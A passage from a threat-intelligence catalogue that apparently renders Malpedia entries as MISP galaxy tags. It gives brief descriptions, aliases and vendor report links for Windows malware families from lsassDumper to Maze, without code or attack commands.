https://securelist.com/the-lazarus-group-deathnote-campaign/109490/

https://vblocalhost.com/uploads/VB2021-Park.pdf

https://www.clearskysec.com/wp-content/uploads/2020/08/Dream-Job-Campaign.pdf

lsassDumper

This in Go written malware is lsass process memory dumper, which was custom developed by threat actors according to Security Joes. It has the capability to automatically exfiltrate the results to the free file transfer service "transfer.sh".

The tag is: misp-galaxy:malpedia="lsassDumper"

lsassDumper is also known as:

Table 3922. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lsassdumper

https://www.bleepingcomputer.com/news/security/hackers-fork-open-source-reverse-tunneling-tool-for-persistence/

https://secjoes-reports.s3.eu-central-1.amazonaws.com/Sockbot%2Bin%2BGoLand.pdf

Lu0Bot

According to PCrisk, Lu0bot es un software malicioso. El malware es ligero, por lo que su uso de los recursos del sistema es bajo. Esto complica la detección de Lu0bot, ya que no causa síntomas significativos, como una grave disminución del rendimiento del sistema.

El programa malicioso funciona como un recolector de telemetría.

The tag is: misp-galaxy:malpedia="Lu0Bot"

Lu0Bot is also known as:

Table 3923. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lu0bot

https://bazaar.abuse.ch/browse/tag/Lu0Bot/

https://embee-research.ghost.io/practical-signatures-for-identifying-malware-with-yara/

Luca Stealer

According to PCRisk, The Luca stealer can extract a variety of information from compromised machines. It targets data related to the following: operating system, device name, CPUs, desktop environment, network interface, user account name, preferred system language, running processes, etc.

This malicious program can steal information from over thirty Chromium-based browsers. From these applications, Luca can obtain Internet cookies, account log-in credentials (usernames/passwords), and credit card numbers. Additionally, the stealer can extract data from password manager and cryptowallet browser extensions compatible with over twenty browsers.

This malware also targets various messaging applications like Telegram, Discord, ICQ, Skype, Element, etc. It likewise aims to acquire information from gaming-related software such as Steam and Uplay (Ubisoft Connect). Furthermore, some versions of Luca can take screenshots and download the files stored on victims' devices.

The tag is: misp-galaxy:malpedia="Luca Stealer"

Luca Stealer is also known as:

Table 3925. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.luca_stealer

https://blogs.blackberry.com/en/2022/08/luca-stealer-targets-password-managers-and-cryptocurrency-wallets

Lumma Stealer

Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim’s machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.

The tag is: misp-galaxy:malpedia="Lumma Stealer"

Lumma Stealer is also known as:

  • LummaC2 Stealer

Table 3928. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

https://www.rapid7.com/blog/post/2023/08/31/fake-update-utilizes-new-idat-loader-to-execute-stealc-and-lumma-infostealers/

https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx

https://www.elastic.co/security-labs/ghostpulse-haunts-victims-using-defense-evasion-bag-o-tricks

https://www.intrinsec.com/lumma_stealer_actively_deployed_in_multiple_campaigns/

https://twitter.com/sekoia_io/status/1572889505497223169

https://twitter.com/fumik0_/status/1559474920152875008

https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/

https://www.youtube.com/watch?v=lmMA4WYJEOY

https://medium.com/s2wblog/lumma-stealer-targets-youtubers-via-spear-phishing-email-ade740d486f7

https://www.esentire.com/blog/the-case-of-lummac2-v4-0

https://twitter.com/Ishusoka/status/1614028229307928582

https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-lummac2-94111d4b1e11

https://outpost24.com/blog/everything-you-need-to-know-lummac2-stealer

https://darktrace.com/blog/the-rise-of-the-lumma-info-stealer

https://outpost24.com/blog/lummac2-anti-sandbox-technique-trigonometry-human-detection/

LunchMoney

An uploader that can exfiltrate files to Dropbox.

The tag is: misp-galaxy:malpedia="LunchMoney"

LunchMoney is also known as:

Table 3929. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lunchmoney

https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html

https://twitter.com/MrDanPerez/status/1097881406661902337

Lurk

The tag is: misp-galaxy:malpedia="Lurk"

Lurk is also known as:

Table 3930. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lurk

https://www.secureworks.com/research/malware-analysis-of-the-lurk-downloader

Luzo

The tag is: misp-galaxy:malpedia="Luzo"

Luzo is also known as:

Table 3931. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.luzo

Lyceum .NET DNS Backdoor

This .NET written malware is used as backdoor using the dns protocol by a state sponsored threat actor. It implements additional capabilities (e.g. execution of commands, taking screenshots, listing diles/directories/installed applications, and uploading/downloading/execution of files). There are also variants using HTTP (.Net) and also one written in Golang.

The tag is: misp-galaxy:malpedia="Lyceum .NET DNS Backdoor"

Lyceum .NET DNS Backdoor is also known as:

Table 3932. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lyceum_dns_backdoor_dotnet

https://www.zscaler.com/blogs/security-research/lyceum-net-dns-backdoor

https://research.checkpoint.com/2022/state-sponsored-attack-groups-capitalise-on-russia-ukraine-war-for-cyber-espionage/

Lyceum .NET TCP Backdoor

This .Net written malware is used as backdoor using the http protocol by a state sponsored threat actor. It implements additional capabilities (e.g. execution of commands, taking screenshots, listing diles/directories/installed applications, and uploading/downloading/execution of files). There are also variants using DNS (.Net) and also one written in Golang.

The tag is: misp-galaxy:malpedia="Lyceum .NET TCP Backdoor"

Lyceum .NET TCP Backdoor is also known as:

Table 3933. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lyceum_http_backdoor_dotnet

https://research.checkpoint.com/2022/state-sponsored-attack-groups-capitalise-on-russia-ukraine-war-for-cyber-espionage/

Lyceum Golang HTTP Backdoor

This Golang written malware is used as backdoor using the http protocol by a state sponsored threat actor (TA). This backdoor is running in a loop of three stages: - Check the connectivity - Registration of the victim - Retrieval and execution of commands This TA is using also variants .NET backdoors utilizing HTTP and DNS.

The tag is: misp-galaxy:malpedia="Lyceum Golang HTTP Backdoor"

Lyceum Golang HTTP Backdoor is also known as:

Table 3934. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lyceum_http_backdoor_golang

https://research.checkpoint.com/2022/state-sponsored-attack-groups-capitalise-on-russia-ukraine-war-for-cyber-espionage/

M00nD3V Logger

According Zscaler, M00nD3V Logger has the ability to steal confidential information, such as browser passwords, FTP client passwords, email client passwords, DynDNS credentials, JDownloader credentials; capture Windows keystrokes; and gain access to the webcam and hook the clipboard. In all, it has the ability to steal passwords from 42 applications.

The tag is: misp-galaxy:malpedia="M00nD3V Logger"

M00nD3V Logger is also known as:

Table 3936. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.m00nd3v

https://www.zscaler.com/blogs/research/deep-dive-m00nd3v-logger

Machete

According to ESET, Machete’s dropper is a RAR SFX executable. Three py2exe components are dropped: GoogleCrash.exe, Chrome.exe and GoogleUpdate.exe. A single configuration file, jer.dll, is dropped, and it contains base64‑encoded text that corresponds to AES‑encrypted strings. GoogleCrash.exe is the main component of the malware. It schedules execution of the other two components and creates Windows Task Scheduler tasks to achieve persistence. Regarding the geolocation of victims, Chrome.exe collects data about nearby Wi-Fi networks and sends it to the Mozilla Location Service API. In short, this application provides geolocation coordinates when it’s given other sources of data such as Bluetooth beacons, cell towers or Wi-Fi access points. Then the malware takes latitude and longitude coordinates to build a Google Maps URL. The GoogleUpdate.exe component is responsible for communicating with the remote C&C server. The configuration to set the connection is read from the jer.dll file: domain name, username and password. The principal means of communication for Machete is via FTP, although HTTP communication was implemented as a fallback in 2019.

The tag is: misp-galaxy:malpedia="Machete"

Machete is also known as:

  • El Machete

Table 3940. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.machete

https://threatvector.cylance.com/en_us/home/threat-spotlight-machete-info-stealer.html

https://www.cylance.com/en_us/blog/el-machete-malware-attacks-cut-through-latam.html

https://securelist.com/el-machete/66108/

https://www.welivesecurity.com/2019/08/05/sharpening-machete-cyberespionage/

https://medium.com/@verovaleros/el-machete-what-do-we-know-about-the-apt-targeting-latin-america-be7d11e690e6

https://www.atomicmatryoshka.com/post/infographic-apts-in-south-america

https://static1.squarespace.com/static/5a01100f692ebe0459a1859f/t/5da340ded5ccf627e1764059/1570980068506/Day3-1130-Green-A+study+of+Machete+cyber+espionage+operations+in+Latin+America.pdf

MadMax

The tag is: misp-galaxy:malpedia="MadMax"

MadMax is also known as:

Table 3941. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.madmax

Magala

The tag is: misp-galaxy:malpedia="Magala"

Magala is also known as:

Table 3942. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.magala

https://securelist.com/the-magala-trojan-clicker-a-hidden-advertising-threat/78920/

Maggie

According to DCSO, this malware is written as a Extended Stored Procedure for a MSSQL server. The backdoor has capabilities to bruteforce logins to other MSSQL servers, adding a special hardcoded backdoor user in the case of successfully bruteforcing admin logins.

The tag is: misp-galaxy:malpedia="Maggie"

Maggie is also known as:

Table 3943. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.maggie

https://medium.com/@DCSO_CyTec/tracking-down-maggie-4d889872513d

https://www.sentinelone.com/labs/wip19-espionage-new-chinese-apt-targets-it-service-providers-and-telcos-with-signed-malware/

https://medium.com/@DCSO_CyTec/mssql-meet-maggie-898773df3b01

MagicRAT

According to Talos, MagicRAT is programmed in C++ programming language and uses the Qt Framework by statically linking it to the RAT on 32- and 64-bit versions. The Qt Framework is a programming library for developing graphical user interfaces, of which this RAT has none. Talos thinks that the objective was to increase the complexity of the code, thus making human analysis harder. On the other hand, since there are very few examples (if any) of malware programmed with Qt Framework, this also makes machine learning and heuristic analysis detection less reliable. The RAT uses the Qt classes throughout its entire code. The configuration is dynamically stored in a QSettings class eventually being saved to disk, a typical functionality provided by that class.

MagicRAT provides the operator with a remote shell on the victim’s system for arbitrary command execution, along with the ability to rename, move and delete files on the endpoint. The operator can determine the timing for the implant to sleep, change the C2 URLs and delete the implant from the infected system.

The tag is: misp-galaxy:malpedia="MagicRAT"

MagicRAT is also known as:

Table 3944. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.magic_rat

https://media.defense.gov/2023/Feb/09/2003159161/-1/-1/0/CSA_RANSOMWARE_ATTACKS_ON_CI_FUND_DPRK_ACTIVITIES.PDF

https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html

https://www.attackiq.com/2023/01/05/emulating-the-highly-sophisticated-north-korean-adversary-lazarus-group/

https://blog.talosintelligence.com/2022/09/lazarus-magicrat.html

https://www.youtube.com/watch?v=nUjxH1gW53s

Magniber

According to TXOne, The Magniber ransomware was first identified in late 2017 when it was discovered using the Magnitude Exploit Kit to conduct malvertising attacks against users in South Korea. However, it has remained active since then, continually updating its tactics by employing new obfuscation techniques and methods of evasion. In April 2022, Magniber gained notoriety for disguising itself as a Windows update file to lure victims into installing it. It then began spreading via JavaScript in September 2022.

The tag is: misp-galaxy:malpedia="Magniber"

Magniber is also known as:

Table 3945. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.magniber

https://www.bleepingcomputer.com/news/security/magniber-ransomware-gang-now-exploits-internet-explorer-flaws-in-attacks/

https://www.bleepingcomputer.com/news/security/fake-windows-10-updates-infect-you-with-magniber-ransomware/

https://www.malwarebytes.com/blog/news/2018/07/magniber-ransomware-improves-expands-within-asia

https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/

https://asec.ahnlab.com/en/30645/

https://blog.google/threat-analysis-group/magniber-ransomware-actors-used-a-variant-of-microsoft-smartscreen-bypass/

https://asec.ahnlab.com/en/41889/

http://asec.ahnlab.com/1124

https://threatresearch.ext.hp.com/magniber-ransomware-switches-to-javascript-targeting-home-users-with-fake-software-updates/

https://asec.ahnlab.com/en/19273/

https://teamt5.org/tw/posts/internet-explorer-the-vulnerability-ridden-browser/

https://www.youtube.com/watch?v=lqWJaaofNf4

https://hshrzd.wordpress.com/2023/03/30/magniber-ransomware-analysis/

https://www.crowdstrike.com/blog/magniber-ransomware-caught-using-printnightmare-vulnerability/

https://therecord.media/printnightmare-vulnerability-weaponized-by-magniber-ransomware-gang/

https://decoded.avast.io/janvojtesek/exploit-kits-vs-google-chrome/

https://medium.com/coinmonks/passive-income-of-cyber-criminals-dissecting-bitcoin-multiplier-scam-b9d2b6048372

https://forensicitguy.github.io/analyzing-magnitude-magniber-appx/

https://decoded.avast.io/janvojtesek/magnitude-exploit-kit-still-alive-and-kicking/

https://www.cybereason.com/blog/threat-analysis-report-printnightmare-and-magniber-ransomware

https://www.cybereason.com/blog/threat-analysis-msi-masquerading-as-software-installer

Mailto

The tag is: misp-galaxy:malpedia="Mailto"

Mailto is also known as:

  • Koko Ransomware

  • NetWalker

Table 3946. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mailto

https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/

https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf

https://id-ransomware.blogspot.com/2019/09/koko-ransomware.html

https://www.youtube.com/watch?v=q8of74upT_g

https://www.bleepingcomputer.com/news/security/michigan-state-university-network-breached-in-ransomware-attack/

https://www.crowdstrike.com/blog/analysis-of-ecrime-menu-style-toolkits/

https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/

https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound

https://www.bleepingcomputer.com/news/security/enel-group-hit-by-ransomware-again-netwalker-demands-14-million

https://danusminimus.github.io/Zero2Auto-Netwalker-Walkthrough/

https://go.crowdstrike.com/rs/281-OBQ-266/images/ReportCSIT-20081e.pdf

https://lopqto.me/posts/automated-dynamic-import-resolving

https://www.zeit.de/digital/2021-06/cybercrime-extortion-internet-spyware-ransomware-police-prosecution-hackers

https://seguranca-informatica.pt/netwalker-ransomware-full-analysis/

https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf

https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/

https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/

https://www.ic3.gov/media/news/2020/200929-2.pdf

https://www.ucsf.edu/news/2020/06/417911/update-it-security-incident-ucsf

https://krebsonsecurity.com/2021/01/arrest-seizures-tied-to-netwalker-ransomware

https://tccontre.blogspot.com/2020/05/netwalker-ransomware-api-call.html

https://zero2auto.com/2020/05/19/netwalker-re/

https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html

https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/an-in-depth-look-at-mailto-ransomware-part-one-of-three/

https://www.incibe-cert.es/blog/ransomware-netwalker-analisis-y-medidas-preventivas

https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html

https://www.advanced-intel.com/post/netwalker-ransomware-group-enters-advanced-targeting-game

https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/

https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3

https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/

https://cert-agid.gov.it/news/netwalker-il-ransomware-che-ha-beffato-lintera-community/

https://news.sophos.com/en-us/2020/05/27/netwalker-ransomware-tools-give-insight-into-threat-actor/

https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf

https://www.justice.gov/opa/pr/department-justice-launches-global-action-against-netwalker-ransomware

https://www.justice.gov/usao-mdfl/press-release/file/1360846/download

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/

https://www.bleepingcomputer.com/news/security/netwalker-ransomware-affiliate-sentenced-to-80-months-in-prison/

https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/

https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/

https://www.bleepingcomputer.com/news/security/netwalker-ransomware-infecting-users-via-coronavirus-phishing/

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://sites.temple.edu/care/ci-rw-attacks/

https://www.cybereason.com/blog/cybereason-vs.-netwalker-ransomware

https://0x00-0x7f.github.io/Netwalker-from-Powershell-reflective-loader-to-injected-Dll/

https://s3.documentcloud.org/documents/21199896/vachon-desjardins-court-docs.pdf

https://therecord.media/ransomwhere-project-wants-to-create-a-database-of-past-ransomware-payments/

https://www.bleepingcomputer.com/news/security/enel-group-hit-by-ransomware-again-netwalker-demands-14-million/

https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/an-in-depth-look-at-mailto-ransomware-part-two-of-three/

https://www.bleepingcomputer.com/news/security/mailto-netwalker-ransomware-targets-enterprise-networks/

https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf

https://blogs.blackberry.com/en/2021/03/zerologon-to-ransomware

https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/an-in-depth-look-at-mailto-ransomware-part-three-of-three/

https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/

https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/

https://zengo.com/bitcoin-ransomware-detective-ucsf/

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/take-a-netwalk-on-the-wild-side/

MakLoader

The tag is: misp-galaxy:malpedia="MakLoader"

MakLoader is also known as:

Table 3950. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.makloader

https://twitter.com/James_inthe_box/status/1046844087469391872

Makop

BeforeCrypt describes that MAKOP Ransomware first appeared in 2020 as an offshoot of the PHOBOS variant, and that it has infected a number of computers since then. Files encrypted by MAKOP often have the extension “.makop”. You may also notice that your desktop wallpaper has changed. MAKOP uses RSA encryption. There are no known free decryption tools capable of decrypting files encrypted by MAKOP.

The tag is: misp-galaxy:malpedia="Makop"

Makop is also known as:

Table 3951. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.makop

https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/

https://blog.morphisec.com/the-fair-upgrade-variant-of-phobos-ransomware

https://lifars.com/wp-content/uploads/2021/08/Makop-Ransomware-Whitepaper-case-studyNEW-1.pdf

https://twitter.com/siri_urz/status/1221797493849018368

https://medium.com/@lcam/makop-the-toolkit-of-a-criminal-gang-53cd44563c11

Maktub

According to PCrisk, Maktub is ransomware distributed via zipped Word documents. Once the file is extracted and opened, Maktub infiltrates the system and encrypts files stored on the victim’s computer. Maktub ransomware adds a .NORV, .gyul (or other random) extension to each file encrypted, thus, making it straightforward to determine which files are encrypted.

The tag is: misp-galaxy:malpedia="Maktub"

Maktub is also known as:

Table 3952. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.maktub

https://bartblaze.blogspot.de/2018/04/maktub-ransomware-possibly-rebranded-as.html

https://www.intezer.com/iron-cybercrime-group-under-the-scope-2/

https://blog.malwarebytes.com/threat-analysis/2016/03/maktub-locker-beautiful-and-dangerous/

MalumPOS

The tag is: misp-galaxy:malpedia="MalumPOS"

MalumPOS is also known as:

Table 3953. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.malumpos

http://documents.trendmicro.com/images/tex/pdf/MalumPOS%20Technical%20Brief.pdf

Mamba

According to PCrisk, Mamba is an updated variant of high-risk ransomware called Phobos. After successful infiltration, Mamba encrypts stored files and appends filenames with the ".mamba" extension plus the victim’s unique ID and developer’s email address.

The tag is: misp-galaxy:malpedia="Mamba"

Mamba is also known as:

  • DiskCryptor

  • HDDCryptor

Table 3954. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mamba

https://securelist.com/the-return-of-mamba-ransomware/79403/

https://www.ic3.gov/Media/News/2021/210323.pdf

http://blog.trendmicro.com/trendlabs-security-intelligence/bksod-by-ransomware-hddcryptor-uses-commercial-tools-to-encrypt-network-shares-and-lock-hdds/

https://www.youtube.com/watch?v=LUxOcpIRxmg

Manifestus

The tag is: misp-galaxy:malpedia="Manifestus"

Manifestus is also known as:

Table 3958. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.manifestus_ransomware

https://twitter.com/struppigel/status/811587154983981056

Manjusaka (Windows)

Cisco Talos compared this RAT to Cobalt Strike and Sliver. Written in Rust.

The tag is: misp-galaxy:malpedia="Manjusaka (Windows)"

Manjusaka (Windows) is also known as:

Table 3960. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.manjusaka

https://github.com/avast/ioc/tree/master/Manjusaka

https://blog.talosintelligence.com/2022/08/manjusaka-offensive-framework.html

Maoloa

Ransomware family closely related to GlobeImposter, notable for its use of SHACAL-2 encryption algorithm.

The tag is: misp-galaxy:malpedia="Maoloa"

Maoloa is also known as:

Table 3961. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.maoloa

https://id-ransomware.blogspot.com/2019/02/maoloa-ransomware.html

https://www.sangfor.com/blog/cybersecurity/alert-new-globeimposter-olympian-gods-20-coming

https://news.sophos.com/en-us/2022/07/20/ooda-x-ops-takes-on-burgeoning-sql-server-attacks/

Marap

Marap is a downloader, named after its command and control (C&C) phone home parameter "param" spelled backwards. It is written in C and contains a few notable anti-analysis features.

The tag is: misp-galaxy:malpedia="Marap"

Marap is also known as:

Table 3963. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.marap

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf

https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-prepare-more-part-1-marap

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf

MarkiRAT

The tag is: misp-galaxy:malpedia="MarkiRAT"

MarkiRAT is also known as:

Table 3965. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.markirat

https://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/

MarraCrypt

The tag is: misp-galaxy:malpedia="MarraCrypt"

MarraCrypt is also known as:

Table 3966. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.marracrypt

https://securitynews.sonicwall.com/xmlpost/marracrypt-ransomware-actively-spreading-in-the-wild/

Mars

Ransomware written in Delphi.

The tag is: misp-galaxy:malpedia="Mars"

Mars is also known as:

  • MarsDecrypt

Table 3967. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mars

https://id-ransomware.blogspot.com/2020/10/mars-ransomware.html

Mars Stealer

3xp0rt describes Mars Stealer as an improved successor of Oski Stealer, supporting stealing from current browsers and targeting crypto currencies and 2FA plugins.

The tag is: misp-galaxy:malpedia="Mars Stealer"

Mars Stealer is also known as:

Table 3968. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mars_stealer

https://drive.google.com/file/d/14cmYxzowVLyuiS5qDGOKzgI2_vak2Fve/view

https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-mars-stealer

https://x-junior.github.io/malware%20analysis/MarsStealer/

https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf

https://www.esentire.com/blog/fake-chrome-setup-leads-to-netsupportmanager-rat-and-mars-stealer

https://www.microsoft.com/security/blog/2022/05/17/in-hot-pursuit-of-cryware-defending-hot-wallets-from-attacks/

https://www.bleepingcomputer.com/news/security/new-meta-information-stealer-distributed-in-malspam-campaign/

https://blog.cyble.com/2022/08/02/fake-atomic-wallet-website-distributing-mars-stealer/

https://isc.sans.edu/diary/Arkei+Variants%3A+From+Vidar+to+Mars+Stealer/28468

https://ke-la.com/information-stealers-a-new-landscape/

https://resources.infosecinstitute.com/topic/mars-stealer-malware-analysis/

https://3xp0rt.com/posts/mars-stealer

https://threatmon.io/mars-stealer-malware-analysis-threatmon/

https://isc.sans.edu/diary/rss/28468

https://cert.gov.ua/article/38606

https://blog.morphisec.com/threat-research-mars-stealer

https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/

https://blog.sekoia.io/mars-a-red-hot-information-stealer/

https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/

https://cyberint.com/blog/research/mars-stealer/

Masad Stealer

The tag is: misp-galaxy:malpedia="Masad Stealer"

Masad Stealer is also known as:

Table 3969. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.masad_stealer

https://blogs.juniper.net/en-us/threat-research/masad-stealer-exfiltrating-using-telegram

Matanbuchus

According to PCrisk, Matanbuchus is a loader-type malicious program offered by its developers as Malware-as-a-Service (MaaS). This piece of software is designed to cause chain infections.

Since it is used as a MaaS, both the malware it infiltrates into systems, and the attack reasons can vary - depending on the cyber criminals operating it. Matanbuchus has been observed being used in attacks against US universities and high schools, as well as a Belgian high-tech organization.

The tag is: misp-galaxy:malpedia="Matanbuchus"

Matanbuchus is also known as:

Table 3971. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.matanbuchus

https://r136a1.info/2022/05/25/introduction-of-a-pe-file-extractor-for-various-situations/

https://medium.com/@DCSO_CyTec/a-deal-with-the-devil-analysis-of-a-recent-matanbuchus-sample-3ce991951d6a

https://research.openanalysis.net/matanbuchus/loader/yara/triage/dumpulator/emulation/2022/06/19/matanbuchus-triage.html

https://www.0ffset.net/reverse-engineering/matanbuchus-loader-analysis/

https://unit42.paloaltonetworks.com/matanbuchus-malware-as-a-service/

https://isc.sans.edu/diary/rss/28752

https://www.cybereason.com/blog/threat-analysis-msi-masquerading-as-software-installer

https://blog.cyble.com/2022/06/23/matanbuchus-loader-resurfaces/

Matiex

Matiex Keylogger is being sold in the underground forums, due to their gained popularity, and can also be used as MaaS (Malware-as-a-service) because of their ease of use, competitive pricing and immediate response from support.

The tag is: misp-galaxy:malpedia="Matiex"

Matiex is also known as:

Table 3972. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.matiex

https://labs.k7computing.com/index.php/matiex-on-sale-underground/

Matrix Banker

The tag is: misp-galaxy:malpedia="Matrix Banker"

Matrix Banker is also known as:

Table 3973. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.matrix_banker

https://www.arbornetworks.com/blog/asert/another-banker-enters-matrix/

Matrix Ransom

Matrix is a ransomware that encrypts a victim’s files and demands a ransom in cryptocurrency to decrypt them. It is distributed through phishing emails, hacking toolkits, and software downloaders. Matrix is a serious threat and can cause significant damage to a victim’s data.

The tag is: misp-galaxy:malpedia="Matrix Ransom"

Matrix Ransom is also known as:

Table 3974. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.matrix_ransom

https://www.blackhoodie.re/assets/archive/Matrix_Ransomware_blackhoodie.pdf

https://unit42.paloaltonetworks.com/matrix-ransomware/

https://blogs.blackberry.com/en/2018/11/threat-spotlight-inside-vssdestroy-ransomware

https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf

https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophoslabs-matrix-report.pdf

https://news.sophos.com/en-us/2019/01/30/matrix-targeted-small-scale-canary-in-the-coal-mine-ransomware/

Matsnu

The tag is: misp-galaxy:malpedia="Matsnu"

Matsnu is also known as:

Table 3976. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.matsnu

https://blog.checkpoint.com/wp-content/uploads/2015/07/matsnu-malwareid-technical-brief.pdf

Maxtrilha

Banking trojan written in Delphi, targeting customers of European and South American banks.

The tag is: misp-galaxy:malpedia="Maxtrilha"

Maxtrilha is also known as:

Table 3979. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.maxtrilha

https://seguranca-informatica.pt/the-new-maxtrilha-trojan-is-being-disseminated-and-targeting-several-banks/.YT3_VfwzaKN

Maze

Maze Ransomware encrypts files and makes them inaccessible while adding a custom extension containing part of the ID of the victim. The ransom note is placed inside a text file and an htm file. There are a few different extensions appended to files which are randomly generated.

Actors are known to exfiltrate the data from the network for further extortion. It spreads mainly using email spam and various exploit kits (Spelevo, Fallout).

The code of Maze ransomware is highly complicated and obfuscated, which helps to evade security solutions using signature-based detections.

The tag is: misp-galaxy:malpedia="Maze"

Maze is also known as:

  • ChaCha

Table 3980. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.maze

